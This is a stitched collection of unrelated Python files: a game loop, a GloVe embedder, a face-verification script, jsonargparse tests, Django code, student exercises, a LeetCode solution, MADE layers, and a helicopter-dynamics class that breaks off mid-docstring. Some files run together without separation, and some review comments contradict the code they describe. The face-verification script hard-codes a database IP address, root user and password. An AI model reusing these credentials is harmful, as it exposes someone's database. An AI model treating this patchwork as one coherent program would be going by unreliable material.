gui = Window(1024, 768)
gui.set_title("Stone Jump")

# Screens share the window and the state flag; game is passed to the menus so
# they can reset/inspect it.
game = Game_itself(gui, level)
main_menu = Main_menu(gui, level, game)
gameover_menu = Gameover(gui, level, game)

# Background music, looped at 80% volume; started only once gameplay begins.
sound = Sound("Assets/music.ogg")
sound.set_volume(80)
sound.set_repeat(True)
# Main loop: each frame, draw whichever screen matches the current state.
while True:
    if level[0] == 0:
        # case menu
        gui.set_background_color((0, 0, 0))
        main_menu.draw()
    elif level[0] == 1:
        # gameplay: keep the soundtrack running
        if not sound.is_playing():
            sound.play()
        game.draw()
    elif level[0] == 2:
        # gameover: stop the music and show the final score
        if (sound.is_playing()):
            sound.stop()
        scoreFinal = game.score_counter
        score = game.score
        # reposition the score sprite for the game-over layout
        score.x = 415
        score.y = 450
        gui.set_background_color((0, 0, 0))
        gameover_menu.draw()
        score.draw(scoreFinal)
    gui.update()
|
import numpy as np
class GloveClassifier(object):
    """Loads GloVe vectors and maps sentences to mean word embeddings."""

    def __init__(self, source):
        # Path to a GloVe text file: one "<word> <float> <float> ..." per line.
        self.source = source
        self.embeddings, self.word2vec, self.idx2word = self.read_glove_source()

    def read_glove_source(self):
        """Read the GloVe pre-trained embeddings from self.source.

        :return: (embeddings, word2vec, idx2word) -- a list of float32 vectors,
            a word -> vector mapping, and the word at each index.
        """
        embeddings = []
        word2vec = {}
        idx2word = []
        with open(self.source) as file:
            # Stream line by line instead of readlines() -- avoids holding the
            # whole (potentially large) file in memory at once.
            for line in file:
                data = line.split()
                word = data[0]
                vector = np.asarray(data[1:], dtype='float32')
                embeddings.append(vector)
                idx2word.append(word)
                word2vec[word] = vector
        return embeddings, word2vec, idx2word

    def fit_transform(self, data_list):
        """Map each sentence to the mean embedding of its known words.

        :param data_list: list of whitespace-separated sentences
        :return: list with one mean vector per sentence; 0.0 for sentences
            containing no known words
        """
        bow = []
        for sentence in data_list:
            vectors = [self.word2vec[w] for w in sentence.split() if w in self.word2vec]
            if vectors:
                # Bug fix: the original divided by len(sentence) -- the number
                # of CHARACTERS in the sentence -- instead of the number of
                # matched words, so the result was not the mean embedding.
                bow.append(sum(vectors) / len(vectors))
            else:
                # No known words: keep the original's scalar-zero behavior.
                bow.append(0.0)
        return bow
|
# face verification with the VGGFace2 model
import pickle

from matplotlib import pyplot
from PIL import Image
from numpy import asarray
from scipy.spatial.distance import cosine
from mtcnn.mtcnn import MTCNN
from keras_vggface.vggface import VGGFace
from keras_vggface.utils import preprocess_input
import mysql.connector
def extract_face(filename, required_size=(224, 224)):
    """Extract the first detected face from a photo file.

    Returns the face crop resized to `required_size` as a numpy array.
    """
    pixels = pyplot.imread(filename)
    # MTCNN (default weights) returns a list of detections with bounding boxes.
    detections = MTCNN().detect_faces(pixels)
    # Only the first detected face is used.
    left, top, width, height = detections[0]['box']
    right, bottom = left + width, top + height
    face_pixels = pixels[top:bottom, left:right]
    # Resize via PIL to the input size the embedding model expects.
    resized = Image.fromarray(face_pixels).resize(required_size)
    return asarray(resized)
def get_embeddings(filenames):
    """Return one VGGFace embedding (resnet50, avg-pooled) per photo file."""
    # Crop faces and stack them into a float32 batch.
    samples = asarray([extract_face(name) for name in filenames], 'float32')
    # Center pixels the same way the pretrained network was trained.
    samples = preprocess_input(samples, version=2)
    # Headless resnet50 with global average pooling yields fixed-size vectors.
    model = VGGFace(model='resnet50', include_top=False,
                    input_shape=(224, 224, 3), pooling='avg')
    yhat = model.predict(samples)
    print(f'embedding shape = {yhat.shape}')
    return yhat
# determine if a candidate face is a match for a known face
def is_match(known_embedding, candidate_embedding, thresh=0.5):
# calculate distance between embeddings
score = cosine(known_embedding, candidate_embedding)
if score <= thresh:
print('>face is a Match (%.3f <= %.3f)' % (score, thresh))
else:
print('>face is NOT a Match (%.3f > %.3f)' % (score, thresh))
# Filenames of the probe photos (eventually these should be frames captured at
# verification time, e.g. after the Raspberry Pi scans a QR code).
filenames = ['1.jpeg', '2.jpeg', '3.jpeg', '11.jpeg']
embeddings = get_embeddings(filenames)

# The reference embedding is stored pickled in the database's faceEmbedding
# column. The original line `target_id = pickle.loads(......)` was a literal
# syntax error; keep the step explicit but inert until the blob is wired in.
target_blob = None  # TODO: fetch the faceEmbedding blob for the enrolled user
if target_blob is not None:
    # SECURITY NOTE: pickle.loads must only be applied to trusted data.
    target_id = pickle.loads(target_blob)
    # verify by comparing with the target
    print('start testing')
    is_match(target_id, embeddings[0])
# filenames = ['1.jpeg']
# get embeddings file filenames
# embeddings = get_embeddings(filenames)
# define the target embedding
# get the faceEmbedding column from our database
# and get the numpy array be pickle.loads()
# target_id = pickle.loads(..)

# Connect to the project database to look up enrolled users.
# NOTE(review): credentials are hard-coded here -- move them to config/env.
mydb = mysql.connector.connect(
    host="140.113.79.132",
    user="root",
    password="YYHuang",
    database="covid_project"
)

mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM covid_project.users_user")
myresult = mycursor.fetchall()

# verify by comparing with the target
print('start testing')
# is_match(target_id, embeddings[0])
|
"""Fixtures for pyintesishome_local."""
import pytest
from aioresponses import aioresponses
@pytest.fixture
def mock_aioresponse():
    """Yield an aioresponses mock that intercepts aiohttp requests for a test."""
    with aioresponses() as m:
        yield m
|
# `box` let dict with advanced dot notation access.
from box import Box
import importlib
import json
import sys
def load(fp: object, lang: str = "json") -> dict:
    """Parse an open file into a Box (dot-accessible dict).

    `lang` names the parser module to import (json, yaml, toml, ...); that
    module must expose a `load(fp)` function. Format is NOT inferred from the
    file extension -- it is chosen solely by `lang`.
    """
    parser = importlib.import_module(lang)
    return Box(parser.load(fp))
def load_str(s: str, lang: str = "json") -> dict:
    """Parse a string into a Box using the named parser module.

    Prefers the module's `loads`; falls back to `load` for parsers (e.g. some
    yaml versions) that accept strings directly.

    :raises TypeError: if the module offers neither loads() nor load().
        (Bug fix: the original silently returned None here, contradicting the
        declared `-> dict` return type and deferring the failure to the
        caller's first attribute access.)
    """
    parser = importlib.import_module(lang)
    if hasattr(parser, "loads"):
        return Box(parser.loads(s))
    if hasattr(parser, "load"):
        # NOTE(review): yaml.load without an explicit Loader is unsafe on
        # untrusted input and requires a Loader in PyYAML >= 6 -- confirm.
        return Box(parser.load(s))
    raise TypeError("module {!r} has no loads()/load() function".format(lang))
if __name__ == "__main__":
    # Demo: JSON string, with dot access on the result.
    str_ = """{
"a": "b",
"c": 10
} """
    print(load_str(str_))
    print(load_str(str_).a)

    # Demo: YAML string (pyyaml has no loads(), so the load() fallback is hit).
    str_ = """
invoice: 34843
date : 2001-01-23
"""
    print(load_str(str_, "yaml"))

    # Demo: TOML string.
    str_ = """
# This is a TOML document.
title = "TOML Example"
[owner]
name = "Tom Preston-Werner"
dob = 1979-05-27T07:32:00-08:00 # First class dates
[database]
server = "192.168.1.1"
ports = [ 8001, 8001, 8002 ]
connection_max = 5000
enabled = true
[servers]
# Indentation (tabs and/or spaces) is allowed but not required
[servers.alpha]
ip = "10.0.0.1"
dc = "eqdc10"
[servers.beta]
ip = "10.0.0.2"
dc = "eqdc10"
[clients]
data = [ ["gamma", "delta"], [1, 2] ]
# Line breaks are OK when inside arrays
hosts = [
"alpha",
"omega"
]
"""
    print(load_str(str_, "toml"))

    # Demo: sample files from the test suite.
    with open("tests/samples/a.json", "r") as fp:
        content = load_str(fp.read(), "json")
    print(content)
    print(content.c)
    with open("tests/samples/b.yaml", "r") as fp:
        content = load(fp, "yaml")
    print(content)
    print(content.date)
    with open("tests/samples/c.toml", "r") as fp:
        content = load(fp, "toml")
    print(content)
    print(content.clients)
from __future__ import annotations
import argparse
import platform
import pytest
from jsonargparse import Namespace, dict_to_namespace, namespace_to_dict
from jsonargparse._namespace import meta_keys
# Several tests below rely on attributes being stored in insertion order,
# which is only guaranteed for __setattr__ on CPython.
skip_if_no_setattr_insertion_order = pytest.mark.skipif(
    platform.python_implementation() != "CPython",
    reason="requires __setattr__ insertion order",
)
def test_shallow_dot_set_get():
    # top-level attribute via dot notation
    ns = Namespace()
    ns.a = 1
    assert 1 == ns.a
    assert ns == Namespace(a=1)


def test_shallow_attr_set_get_del():
    # setattr/getattr/delattr behave like regular attribute access
    ns = Namespace()
    setattr(ns, "a", 1)
    assert 1 == getattr(ns, "a")
    assert ns == Namespace(a=1)
    delattr(ns, "a")
    with pytest.raises(AttributeError):
        getattr(ns, "a")


def test_shallow_item_set_get_del():
    # item access mirrors attribute access for top-level keys
    ns = Namespace()
    ns["a"] = 1
    assert 1 == ns["a"]
    assert ns == Namespace(a=1)
    del ns["a"]
    with pytest.raises(KeyError):
        ns["a"]


def test_nested_item_set_get():
    # dotted keys create intermediate namespaces on assignment
    ns = Namespace()
    ns["x.y.z"] = 1
    assert Namespace(x=Namespace(y=Namespace(z=1))) == ns
    assert 1 == ns["x.y.z"]
    assert 1 == ns["x"]["y"]["z"]
    assert Namespace(z=1) == ns["x.y"]
    assert Namespace(z=1) == ns["x"]["y"]
    ns["x.y"] = 2
    assert 2 == ns["x.y"]


def test_nested_item_set_del():
    # deleting a dotted leaf keeps the (now empty) parent namespace
    ns = Namespace()
    ns["x.y"] = 1
    assert Namespace(x=Namespace(y=1)) == ns
    del ns["x.y"]
    assert Namespace(x=Namespace()) == ns


def test_get():
    # .get supports dotted keys and a default, like dict.get
    ns = Namespace()
    ns["x.y"] = 1
    assert 1 == ns.get("x.y")
    assert Namespace(y=1) == ns.get("x")
    assert 2 == ns.get("z", 2)
    assert ns.get("z") is None
@pytest.mark.parametrize("key", [None, True, False, 1, 2.3])
def test_get_non_str_key(key):
    # non-string keys are simply absent: the default is returned
    ns = Namespace()
    assert ns.get(key) is None
    assert ns.get(key, "abc") == "abc"


def test_set_item_nested_dict():
    # a dotted set descends into a plain-dict value
    ns = Namespace(d={"a": 1})
    ns["d.b"] = 2
    assert 2 == ns["d"]["b"]


@pytest.mark.parametrize("key", [None, True, False, 1, 2.3])
def test_contains_non_str_key(key):
    # `in` never matches non-string keys
    ns = Namespace()
    assert key not in ns


def test_pop():
    # pop removes the leaf but keeps intermediate namespaces
    ns = Namespace()
    ns["x.y.z"] = 1
    assert 1 == ns.pop("x.y.z")
    assert ns == Namespace(x=Namespace(y=Namespace()))


def test_nested_item_invalid_set():
    # malformed dotted keys (trailing dot, embedded space) are rejected
    ns = Namespace()
    with pytest.raises(KeyError):
        ns["x."] = 1
    with pytest.raises(KeyError):
        ns["x .y"] = 2


def test_nested_key_in():
    # `in` works at every depth; malformed or non-str keys are never contained
    ns = Namespace()
    ns["x.y.z"] = 1
    assert "x" in ns
    assert "x.y" in ns
    assert "x.y.z" in ns
    assert "a" not in ns
    assert "x.a" not in ns
    assert "x.y.a" not in ns
    assert "x.y.z.a" not in ns
    assert "x..y" not in ns
    assert 123 not in ns
@skip_if_no_setattr_insertion_order
def test_items_generator():
    # items() yields flattened (dotted-key, leaf-value) pairs in insertion
    # order; plain dict values count as leaves
    ns = Namespace()
    ns["a"] = 1
    ns["b.c"] = 2
    ns["b.d"] = 3
    ns["p.q.r"] = {"x": 4, "y": 5}
    items = list(ns.items())
    assert items == [("a", 1), ("b.c", 2), ("b.d", 3), ("p.q.r", {"x": 4, "y": 5})]


@skip_if_no_setattr_insertion_order
def test_keys_generator():
    # keys() yields the flattened dotted keys in insertion order
    ns = Namespace()
    ns["a"] = 1
    ns["b.c"] = 2
    ns["b.d"] = 3
    ns["p.q.r"] = {"x": 4, "y": 5}
    keys = list(ns.keys())
    assert keys == ["a", "b.c", "b.d", "p.q.r"]


@skip_if_no_setattr_insertion_order
def test_values_generator():
    # values() yields the leaf values in insertion order
    ns = Namespace()
    ns["a"] = 1
    ns["b.c"] = 2
    ns["b.d"] = 3
    ns["p.q.r"] = {"x": 4, "y": 5}
    values = list(ns.values())
    assert values == [1, 2, 3, {"x": 4, "y": 5}]
def test_namespace_from_dict():
    # a dict positional is accepted; nested dicts are kept as dicts
    dic = {"a": 1, "b": {"c": 2}}
    ns = Namespace(dic)
    assert ns == Namespace(a=1, b={"c": 2})


def test_as_dict():
    # as_dict converts nested namespaces (even inside dict values) to dicts
    ns = Namespace()
    ns["w"] = 1
    ns["x.y"] = 2
    ns["x.z"] = 3
    ns["p"] = {"q": Namespace(r=4)}
    assert ns.as_dict() == {"w": 1, "x": {"y": 2, "z": 3}, "p": {"q": {"r": 4}}}
    assert Namespace().as_dict() == {}


def test_as_flat():
    # as_flat returns an argparse.Namespace with dotted attribute names
    ns = Namespace()
    ns["w"] = 1
    ns["x.y.z"] = 2
    flat = ns.as_flat()
    assert isinstance(flat, argparse.Namespace)
    assert vars(flat) == {"w": 1, "x.y.z": 2}


def test_clone():
    # clone is a deep copy: equal to the original, sharing no mutable values
    ns = Namespace()
    pqr = {"x": 4, "y": 5}
    ns["a"] = 1
    ns["p.q.r"] = pqr
    assert ns["p.q.r"] is pqr
    assert ns.clone() == ns
    assert ns.clone()["p.q.r"] is not pqr
    assert ns.clone()["p.q"] is not ns["p.q"]


def test_update_shallow():
    # update overwrites existing keys (even with None) and keeps the rest
    ns_from = Namespace(a=1, b=None)
    ns_to = Namespace(a=None, b=2, c=3)
    ns_to.update(ns_from)
    assert ns_to == Namespace(a=1, b=None, c=3)


def test_update_invalid():
    # only namespace-like values can be merged in
    ns = Namespace()
    with pytest.raises(KeyError):
        ns.update(123)


def test_init_from_argparse_flat_namespace():
    # dotted attribute names from argparse are expanded into nested namespaces
    argparse_ns = argparse.Namespace()
    setattr(argparse_ns, "w", 0)
    setattr(argparse_ns, "x.y.a", 1)
    setattr(argparse_ns, "x.y.b", 2)
    setattr(argparse_ns, "z.c", 3)
    ns = Namespace(argparse_ns)
    assert ns == Namespace(w=0, x=Namespace(y=Namespace(a=1, b=2)), z=Namespace(c=3))


def test_init_invalid():
    # the positional must be a dict or argparse.Namespace, without extra kwargs
    with pytest.raises(ValueError):
        Namespace(1)
    with pytest.raises(ValueError):
        Namespace(argparse.Namespace(), x=1)
def test_namespace_to_dict():
    # namespace_to_dict matches as_dict but returns an independent object
    ns = Namespace()
    ns["w"] = 1
    ns["x.y"] = 2
    ns["x.z"] = 3
    dic1 = namespace_to_dict(ns)
    dic2 = ns.as_dict()
    assert dic1 == dic2
    assert dic1 is not dic2


def test_dict_to_namespace():
    # conversion recurses into nested dicts and into dicts inside lists
    ns1 = Namespace(a=1, b=Namespace(c=2), d=[Namespace(e=3)])
    dic = {"a": 1, "b": {"c": 2}, "d": [{"e": 3}]}
    ns2 = dict_to_namespace(dic)
    assert ns1 == ns2


def test_use_for_kwargs():
    # a Namespace can be splatted as keyword arguments
    def func(a=1, b=2, c=3):
        return a, b, c

    kwargs = Namespace(a=4, c=5)
    val = func(**kwargs)
    assert val == (4, 2, 5)


def test_shallow_clashing_keys():
    # keys that shadow Namespace methods (get/pop/update) still work as data
    ns = Namespace()
    assert "get" not in ns
    exec("ns.get = 1")
    assert "get" in ns
    assert ns.get("get") == 1
    assert dict(ns.items()) == {"get": 1}
    ns["pop"] = 2
    assert ns["pop"] == 2
    assert ns.as_dict() == {"get": 1, "pop": 2}
    assert ns.pop("get") == 1
    assert dict(**ns) == {"pop": 2}
    assert ns.as_flat() == argparse.Namespace(pop=2)
    del ns["pop"]
    assert ns == Namespace()
    assert namespace_to_dict(Namespace(update=3)) == {"update": 3}


def test_leaf_clashing_keys():
    # method-shadowing names are fine as leaves of nested namespaces
    ns = Namespace()
    ns["x.get"] = 1
    assert "x.get" in ns
    assert ns.get("x.get") == 1
    assert ns["x.get"] == 1
    assert ns["x"]["get"] == 1
    assert ns.as_dict() == {"x": {"get": 1}}
    assert dict(ns.items()) == {"x.get": 1}
    assert str(ns.as_flat()) == "Namespace(**{'x.get': 1})"
    assert ns.pop("x.get") == 1
    assert ns.get("x.get") is None


def test_shallow_branch_clashing_keys():
    # ...and as branch names at the top level
    ns = Namespace(get=Namespace(x=2))
    assert "get.x" in ns
    assert ns.get("get.x") == 2
    assert ns["get.x"] == 2
    assert ns["get"] == Namespace(x=2)
    assert ns.as_dict() == {"get": {"x": 2}}
    assert dict(ns.items()) == {"get.x": 2}
    assert ns.pop("get.x") == 2


def test_nested_branch_clashing_keys():
    # ...and as intermediate branch names
    ns = Namespace()
    ns["x.get.y"] = 3
    assert "x.get.y" in ns
    assert ns.get("x.get.y") == 3
    assert ns.as_dict() == {"x": {"get": {"y": 3}}}
    assert ns.pop("x.get.y") == 3


@pytest.mark.parametrize("meta_key", meta_keys)
def test_add_argument_meta_key_error(meta_key, parser):
    # reserved meta keys cannot be used as argument names
    with pytest.raises(ValueError) as ctx:
        parser.add_argument(meta_key)
    ctx.match(f'"{meta_key}" not allowed')
|
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from students.utils import format_records
from teachers.models import Teacher
from webargs import fields
from webargs.djangoparser import use_args
# Create your views here.
@use_args({
    "first_name": fields.Str(required=False),
    "last_name": fields.Str(required=False)},
    location="query"
)
def get_teachers(request, args):
    """Return all teachers, narrowed by any query parameters webargs parsed.

    Each supplied query param (first_name / last_name) becomes an exact-match
    filter; chained .filter() calls narrow the queryset cumulatively.
    """
    queryset = Teacher.objects.all()
    for field_name, field_value in args.items():
        queryset = queryset.filter(**{field_name: field_value})
    return HttpResponse(format_records(queryset))
# name: Stephen Wang
# date: November 7, 2020
# purpose: City class
class City:
    """A city record whose numeric fields are parsed from strings (e.g. CSV)."""

    def __init__(self, code, name, region, population, latitude, longtitude):
        self.code = code
        self.name = name
        self.region = region
        # Coerce the string inputs to their numeric types up front.
        self.population = int(population)
        self.latitude = float(latitude)
        self.longtitude = float(longtitude)  # (sic) original attribute spelling

    def __str__(self):
        # Comma-separated: name, population, latitude, longitude
        # (code and region are intentionally omitted, as in the original).
        return f"{self.name},{self.population},{self.latitude},{self.longtitude}"
|
# -*- coding: utf-8 -*-
import time
all_st = time.time()
# import Env
import os, sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../")
from env import Env
Env()
from convert_datetime import *
from aggregate import *
from get_start_end_sta import get_start_end_mod
from pymongo import *
client = MongoClient()
db = client.nm4bd
# input: iso datetime
def analyze_mod(st_dt, ed_dt):
    """Drive the analysis over [st_dt, ed_dt] in 5-second windows.

    :param st_dt: datetime -- start of the range (ISO datetime)
    :param ed_dt: datetime -- end of the range (ISO datetime)
    """
    # Index get_time_no up front to speed up the per-window queries below.
    db.trtmp.create_index([("get_time_no", ASCENDING)])
    tmp_st = st_dt # for debug
    # Walk the range 5 seconds at a time, running the full pipeline per window.
    while(tmp_st <= ed_dt):
        # loop_st = time.time()
        after_5s = shift_seconds(tmp_st, 5)
        ### execute following all process ###
        aggregate_mod(tmp_st, after_5s)
        get_start_end_mod(tmp_st)
        tmp_st = after_5s
        #####################################
        # print(time.time()-loop_st)
# When skipping data collection and running the analysis locally, execute
# directly from main:
#   python analyze.py 20170123012345 20170123123456
if __name__ == "__main__":
    param = sys.argv
    # timestamps arrive as 14-digit strings (YYYYMMDDhhmmss) and are converted
    # to ISO datetimes
    st_dt = dt_from_14digits_to_iso(str(param[1]))
    ed_dt = dt_from_14digits_to_iso(str(param[2]))
    analyze_mod(st_dt, ed_dt)
    print("total:"+str(time.time()-all_st))
|
#program2a
def find(lis, key):
    """Linear search for *key* in *lis*.

    Prints whether the key was found and returns True/False accordingly.
    """
    for item in lis:
        if item == key:
            print("key found")
            return True
    print("key not found")
    return False
# Demo: read an integer from the user and search for it in a fixed list.
lis=[1,2,3,4,5]
key=int(input("enter the key value"))
value=find(lis,key)
print(value)
#program 2b
def str1(sentence):
    """Print the words of *sentence* in reverse order.

    The output keeps a single leading space before the first word,
    matching the original accumulator-based formatting.
    """
    words = sentence.split(" ")
    reversed_text = ""
    for word in reversed(words):
        reversed_text = reversed_text + " " + word
    print(reversed_text)
# Demo: print the words of the user's sentence in reverse order.
sentence=input("enter the string")
str1(sentence)
def str2(sentence):
    """Print *sentence* with each individual word reversed, order preserved."""
    flipped = [word[::-1] for word in sentence.split(" ")]
    print(" ".join(flipped))
sentence=str(input("enter the string"))
# Bug fix: this second demo defined str2 (reverse each word) but then
# called str1 again, leaving str2 dead code. Call str2 as intended.
str2(sentence)
|
# Generated by Django 3.0.3 on 2020-04-07 22:57
import dancingcubeapp.validators
from django.conf import settings
from django.db import migrations, models
# Adds a many-to-many "likes" relation to Map and re-declares upload paths
# and validators for the image, map and music file fields.
class Migration(migrations.Migration):
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('dancingcubeapp', '0007_auto_20200402_1520'),
    ]
    operations = [
        migrations.AddField(
            model_name='map',
            name='likes',
            field=models.ManyToManyField(blank=True, related_name='likes', to=settings.AUTH_USER_MODEL),
        ),
        # NOTE(review): upload_to uses backslashes ('media\\images\\' etc.);
        # Django treats these literally, so on POSIX hosts files land in
        # oddly-named directories. Forward slashes look intended — confirm
        # before changing, since migrations record historical state.
        migrations.AlterField(
            model_name='map',
            name='image',
            field=models.ImageField(blank=True, null=True, upload_to='media\\images\\', validators=[dancingcubeapp.validators.validate_file_extension_for_image]),
        ),
        migrations.AlterField(
            model_name='map',
            name='map',
            field=models.FileField(upload_to='media\\maps\\', validators=[dancingcubeapp.validators.validate_file_extension_for_map]),
        ),
        migrations.AlterField(
            model_name='map',
            name='music',
            field=models.FileField(upload_to='media\\musics\\', validators=[dancingcubeapp.validators.validate_file_extension_for_music]),
        ),
    ]
|
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import Required, Optional
class Simulate(FlaskForm):
    """Form for a memory-hierarchy simulator page.

    Collects a required page-reference list plus optional per-slot fields
    used to display cache lines, TLB entries, physical frames and
    page-table mappings.
    """
    # NOTE(review): wtforms.validators.Required is deprecated and removed in
    # WTForms 3 in favor of DataRequired — confirm the pinned wtforms version.
    data = StringField('Input reference list: ', validators=[Required()])
    # Four direct-mapped cache slots.
    cache_0 = StringField('', validators=[Optional()])
    cache_1 = StringField('', validators=[Optional()])
    cache_2 = StringField('', validators=[Optional()])
    cache_3 = StringField('', validators=[Optional()])
    # Two TLB entries, each split into page number and offset.
    tlb0page = StringField('', validators=[Optional()])
    tlb0offset = StringField('', validators=[Optional()])
    tlb1page = StringField('', validators=[Optional()])
    tlb1offset = StringField('', validators=[Optional()])
    # Eight physical memory frames.
    frame0 = StringField('', validators=[Optional()])
    frame1 = StringField('', validators=[Optional()])
    frame2 = StringField('', validators=[Optional()])
    frame3 = StringField('', validators=[Optional()])
    frame4 = StringField('', validators=[Optional()])
    frame5 = StringField('', validators=[Optional()])
    frame6 = StringField('', validators=[Optional()])
    frame7 = StringField('', validators=[Optional()])
    # Page-table entries: frame assigned to each of eight virtual pages.
    page0frm = StringField('', validators=[Optional()])
    page1frm = StringField('', validators=[Optional()])
    page2frm = StringField('', validators=[Optional()])
    page3frm = StringField('', validators=[Optional()])
    page4frm = StringField('', validators=[Optional()])
    page5frm = StringField('', validators=[Optional()])
    page6frm = StringField('', validators=[Optional()])
    page7frm = StringField('', validators=[Optional()])
|
#
# @lc app=leetcode.cn id=212 lang=python3
#
# [212] 单词搜索 II
#
# @lc code=start
class Solution:
    def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:
        """Return every word in *words* traceable on *board* by moves between
        4-connected cells, using each cell at most once per word.

        Strategy: build a trie of all words (O(N*k)), then DFS from every
        board cell, only descending into trie branches that the next cell's
        letter can extend.
        """
        # 1. Build the trie; '#' marks a complete word.
        root = {}
        for word in words:
            node = root
            for ch in word:
                node = node.setdefault(ch, {})
            node['#'] = True

        found = set()
        rows, cols = len(board), len(board[0])

        def dfs(r, c, node, prefix, seen):
            # A '#' child means the path so far spells a full word.
            if '#' in node:
                found.add(prefix)
            # Try the four neighbours that stay on the board, are unvisited,
            # and whose letter continues some word in the trie.
            for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):
                nr, nc = r + dr, c + dc
                if 0 <= nr < rows and 0 <= nc < cols \
                        and (nr, nc) not in seen and board[nr][nc] in node:
                    dfs(nr, nc, node[board[nr][nc]],
                        prefix + board[nr][nc], seen | {(nr, nc)})

        # 2. Launch a DFS from every cell that starts some word.
        for r in range(rows):
            for c in range(cols):
                ch = board[r][c]
                if ch in root:
                    dfs(r, c, root[ch], ch, {(r, c)})
        return list(found)
# @lc code=end
|
"""
Module containing layers for MADE model
"""
import torch
from torch import nn as nn
from torch.distributions import Uniform
from torch.nn import functional as F
class MaskedLinear(nn.Linear):
    """
    Linear layer whose weight matrix is elementwise-gated by a fixed binary
    mask, as used in autoregressive models such as MADE.
    """

    def __init__(self, in_features, out_features, mask, bias=True):
        super().__init__(in_features, out_features, bias)
        # A buffer (not a Parameter): moves with .to()/.cuda() but is never
        # trained. The given mask is (in, out); the weight is (out, in),
        # hence the transpose on copy.
        self.register_buffer('mask', torch.ones(out_features, in_features))
        self.mask.data.copy_(mask.T)

    def forward(self, x):
        gated_weight = self.weight * self.mask
        return F.linear(x, gated_weight, self.bias)
def create_masks(D, num_classes, h_layers, one_hot_input):
    """
    Build the binary connectivity masks for a MADE-style autoregressive net.

    :param int D: size of input in each dimension
    :param int num_classes: number of possible discrete values
    :param list(int) h_layers: number of neurons in each hidden layer
    :param one_hot_input: if True, repeat input-mask rows per class value
    :return: list of L+1 boolean mask tensors (one per weight matrix)
    """
    L = len(h_layers)
    # Connectivity degree of every unit; key -1 holds the (ordered) inputs.
    degrees = {-1: torch.arange(D)}
    for layer in range(L):
        low = degrees[layer - 1].min().item()
        degrees[layer] = Uniform(low=low, high=D - 1).sample((h_layers[layer],))
    # A hidden unit may connect to units of equal or lower degree (<=);
    # the output layer connection is strict (<) to enforce autoregression.
    masks = []
    for layer in range(L):
        masks.append(degrees[layer - 1].unsqueeze(1) <= degrees[layer].unsqueeze(0))
    masks.append(degrees[L - 1].unsqueeze(1) < degrees[-1].unsqueeze(0))
    # One output column per possible class value.
    masks[-1] = torch.repeat_interleave(masks[-1], num_classes, dim=1)
    if one_hot_input:
        # One input row per possible class value (one-hot encoded input).
        masks[0] = torch.repeat_interleave(masks[0], num_classes, dim=0)
    return masks
|
# Type your code here
def row_sum(list2d):
    """Return a list containing the sum of each row of *list2d*.

    Bug fix: the original accumulated into the shadowed builtin name
    (`sum = sum + x`) and never updated `sam`, so every row reported 0.
    """
    return [sum(row) for row in list2d]
'''
Escreva um programa que leia a velocidade de um carro.
Se ele ultrapassar 80km/h, mostre uma mensagem dizendo que ele foi multado.
A multa vai custar R$7,00 por cada km acima do limite.
'''
velocidade = float(input('Digite a velocidade do carro: '))
if velocidade < 0:
    print('Valor Inválido!')
else:
    if velocidade > 80.00:
        print(f'Você foi multado por ultrapassar o limite de 80km/h')
        # R$7.00 per km/h above the 80 km/h limit.
        multa = (velocidade - 80.00)*7.00
        print(f'Sua multa é de R${multa:.2f}')
    else:
        # Bug fix: the "within limit" message previously printed even when
        # the driver was fined; it now prints only when speed <= 80.
        print('Você está dentro do limite de 80km/k!')
import sys, math
import numpy as np
import os
import copy
import imageio
import time
from .kinematic import euler_to_rotmat, pqr_to_eulerdot_mat
from .dynamics import DynamicSystem, State
from .utils import pi_bound, cross_product
from .lookup import LookUpTable
FTS2KNOT = 0.5924838    # ft/s to knots conversion
EPS = 1e-4              # small value to guard against division by zero
R2D = 180/math.pi       # rad to deg
D2R = 1/R2D             # deg to rad
FT2MTR = 0.3048         # ft to meter
# Bug fix: np.float was merely a deprecated alias of the builtin float and
# was removed in NumPy >= 1.24; using float directly is behavior-identical.
FLOAT_TYPE = float
class HelicopterDynamics(DynamicSystem):
    """Nonlinear helicopter flight-dynamics model.

    Builds up forces and moments from the main rotor, tail rotor, fuselage,
    horizontal/vertical tails and wing on top of the generic DynamicSystem
    integrator, adds terrain lookup from a heightmap, a spring-damper ground
    contact, and a Newton-iteration trim routine.

    NOTE(review): this class uses the deprecated ``np.float`` alias (removed
    in NumPy >= 1.24), so it requires an older NumPy unless those dtype
    arguments are replaced with ``float``.
    """
    # Names of the entries packed into self.observation (see dynamics()).
    _observations = ["POWER", "LON_AIR_SPD", "LAT_AIR_SPD", "DWN_AIR_SPD", "N_VEL", "E_VEL", "DES_RATE",
        "ROLL", "PITCH", "YAW", "ROLL_RATE", "PITCH_RATE", "YAW_RATE",
        "N_POS", "E_POS", "ALTITUDE", "GROUND_ALTITUDE"]
    n_obs = len(_observations)#int(17)
    n_act = int(4)
    def __init__(self, params, dt):
        """Construct the model.

        @param params : dict with 'HELI' (vehicle data) and 'ENV'
                        (atmosphere / terrain / gravity data) sub-dicts
        @param dt     : integration time step [s]
        """
        super(HelicopterDynamics, self).__init__(dt)
        self.HELI = params['HELI']
        self.ENV = params['ENV']
        # Null state dots, since it is not updated.
        self.__precalculations()
        self.set_wind() # wind velocity in earth frame:
        self.__register_states()
        self.init_state = self.state
        self.init_state_dots = self.state_dots
        # Terrain height and normal maps, normalized to [0, 1] on load.
        hmap_img = imageio.imread(os.environ['HELIGYM_RESOURCE_DIR'] + self.ENV["HMAP_PATH"])
        hmap_img = hmap_img/np.iinfo(hmap_img.dtype).max
        normal_img = imageio.imread(os.environ['HELIGYM_RESOURCE_DIR'] + self.ENV["NMAP_PATH"])
        normal_img = normal_img/np.iinfo(normal_img.dtype).max
        self.terrain_hmap = hmap_img*self.ENV["MAX_GR_ALT"]
        self.terrain_normal = normal_img/np.sqrt((normal_img**2+EPS).sum(axis=-1, keepdims=True))
        # Trim condition used when reset()/trim() is called without overrides.
        self.default_trim_cond = {
            "yaw": 0.0,
            "yaw_rate": 0.0,
            "ned_vel": [0.0, 0.0, 0.0],
            "gr_alt": 100.0,
            "xy": [0.0, 0.0],
            "psi_mr": 0.0,
            "psi_tr": 0.0
        }
    def __register_states(self):
        """Register all dynamic states with the base DynamicSystem.

